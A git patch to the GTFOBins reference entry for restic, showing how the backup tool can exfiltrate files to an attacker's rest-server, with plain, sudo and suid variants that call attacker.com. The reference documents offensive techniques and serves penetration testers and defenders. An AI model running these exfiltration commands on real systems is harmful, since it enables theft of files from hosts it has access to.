From 7f6221646b24430f49202635b4c121fb058ffaf8 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Sun, 12 Apr 2020 13:08:55 +0200 Subject: [PATCH] Fix and improve restic --- _gtfobins/restic.md | 51 ++++++++++++++++++++++++++++++++------------- 1 file changed, 37 insertions(+), 14 deletions(-) diff --git a/_gtfobins/restic.md b/_gtfobins/restic.md index bdc2c87..ea362aa 100644 --- a/_gtfobins/restic.md +++ b/_gtfobins/restic.md @@ -1,18 +1,41 @@ --- +description: | + The attacker must setup a server to receive the backups, in the following example [rest-server](https://github.com/restic/rest-server/) is used but there are other options. To start a new instance and create a new repository: + + ```console + RPORT=12345 + NAME=backup_name + ./rest-server --listen ":$RPORT" + restic init -r "rest:http://localhost:$RPORT/$NAME" + ``` + + To extract the data from the restic repository in the current directory on the attacker side: + + ```console + restic restore -r "/tmp/restic/$NAME" latest --target . + ``` + + Upload data to the attacker server with the following commands. functions: + file-upload: + - code: | + RHOST=attacker.com + RPORT=12345 + LFILE=file_or_dir_to_get + NAME=backup_name + restic backup -r "rest:http://$RHOST:$RPORT/$NAME" "$LFILE" sudo: - - description: Restic can be used to backup files. Run the commands in the sequence given below. - code: | - - rest-server --no-auth --listen http://ATTACKER_IP:PORT - - TARGET=rest_repository - BACKUP=file_or_directory_to_backup - sudo restic init -r rest:http://ATTACKER_IP:PORT/$TARGET - sudo restic backup -r rest:http://ATTACKER_IP:PORT/$TARGET $BACKUP - - TARGET=rest_repository - DESTINATION=backup_to_restore - mkdir /tmp/restic/$DESTINATION - restic restore -r /tmp/restic/$TARGET latest --target /tmp/restic/$DESTINATION + - code: | + RHOST=attacker.com + RPORT=12345 + LFILE=file_or_dir_to_get + NAME=backup_name + sudo restic backup -r "rest:http://$RHOST:$RPORT/$NAME" "$LFILE" + suid: + - code: | + RHOST=attacker.com + RPORT=12345 + LFILE=file_or_dir_to_get + NAME=backup_name + ./restic backup -r "rest:http://$RHOST:$RPORT/$NAME" "$LFILE" ---